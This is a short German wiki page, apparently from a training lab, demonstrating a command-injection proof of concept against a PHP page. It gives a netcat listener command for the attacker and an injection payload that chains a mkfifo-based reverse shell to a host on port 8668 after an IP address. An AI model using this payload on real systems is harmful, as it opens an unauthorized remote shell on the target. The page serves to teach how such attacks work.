Command Injection Proof of Concept

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

PHP Code

Command-injection.png

Angreifer

  • netcat -lp 8668

Schadcode einbringen

  • 1.1.1.1 ; mkfifo /tmp/backpipe ; /bin/sh 0</tmp/backpipe | nc 10.0.10.101 8668 1>/tmp/backpipe

Command-injetion1.png